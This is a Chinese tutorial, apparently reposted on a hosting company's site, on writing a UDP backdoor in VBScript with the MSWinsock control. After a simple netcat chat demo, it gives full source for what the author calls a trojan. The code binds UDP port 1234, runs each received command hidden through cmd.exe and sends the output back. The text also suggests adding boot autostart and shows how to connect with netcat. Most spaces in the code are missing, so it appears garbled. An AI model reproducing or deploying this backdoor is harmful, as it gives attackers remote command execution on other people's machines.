VBS+MSWinsock打造灵巧UDP后门的相关资料
作者 佚名
来源 ASP编程
浏览
发布时间 2013-07-09
| t("MSWinsock.Winsock") //使用UDP协议 //建立连接 sock.Protocol=1sock.Connect"127.0.0.1",1234 //定义要发送的数据 sendata="Hello!!!"&chr(13) //发送我们要发的数据 sock.senddatasendata do //如果有数据回应就显示它 ifsock.BytesReceived>0then //定义接收数据类型(数据类型有vbByte、vbInteger、vbLong、vbSingle //vbDouble、vbCurrency、vbDate、vbBoolean、vbError、vbString、vbArray+vbByte) //也只有定义好要接收的数据类型才能收到数据,不然会收到的是一堆乱码; sock.getdatarevdata,vbString; sendata=inputbox(revdata,"RecviedData","请输入你要发的信息") sock.senddatasenddata&chr(13) //当收到含有"exit"字串时结束VBS进程 ifinstr(revdata,"exit")thenexitdo else endif loop //关闭对像套接 sock.close ------------------------------------------ 然后用“nc-u-l-p1234”监听本地UDP端口1234,再运行刚编写的VBS文件,看!我的NC有反应了。 里面的“MicroSoft(r)WindowsBasedScriptHost”就是我们的VBS主进程了。在NC里我们还可以发信息、聊天,怎么样?一个简单的UDPC/S已经完成了。下面我再写一个关于它的利用吧,既然它能访问网络,当然是用它的做个VBS木马啦!老编们不会反对吧!哈哈,Let''sGo! -------------------------- Dimrevdata setsock=createobject("MSWinsock.Winsock") setsc=createobject("WScript.Shell") Setfso=CreateObject("Scripting.FileSystemObject") sock.Protocol=1//这个当然是UDP协议的标识啦 sock.bind1234//绑定本地的UDP端口 Do ifsock.BytesReceived>0then sock.getdatarevdata,vbString ifinstr(revdata,"exit")>0then exitdo else onerrorresumenext tempfile="C:\"&fso.GetTempName ''cmd=right(revdata,len(revdata)-4) cmd=left(revdata,len(revdata)-3) //利用绑定cmd的输出 callsc.Run("cmd.exe/c"&cmd&">"&tempfile,0,True) Settxf=fso.OpenTextFile(tempfile,1,false,0) //把输出的文件读入内存,用SendData发送到客户端 sock.senddatatxf.readall&vbcrlf&vbcrlf txf.close callfso.DeleteFile(TempFile,True) endif //嘻嘻,下面是我的版权喔 sock.senddata"--End--"&vbcrlf&"ForHelpexit:end|run:<RunFileName>"&vbcrlf&"MakedbyAttribData:2004.7.28"&vbcrlf&vbcrlf endif Loop sock.senddata"连接已关闭!"&vbcrlf sock.close sock=nothings ------------------- 到此,代码的基本架构已经完成了,要想做一个全能的木马可以在代码里加上诸如开机自动运行等。由于VBS程序没有设置出错保护,可能一些错误的操作会出现程蹦溃,有兴趣的朋友可以自己试试。用法是先把这个VBS后门运行在服务端,之后就用你的NC连,因为用的是UDP协议,NC的命令行是“NC–uIPPort”,记得要加上那个“-u”参数啊,之后就像WinShell一样用就行了,下面是在我的机器里测试的截图。 至于TCP如何编写,道理也跟UDP差不多,我这里就不再多写了,大家可以自己研究下。 如果有什么好的方法还可以和我一同研究。谢谢观赏。 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
关于VBS+MSWinsock打造灵巧UDP后门的相关资料的所有评论
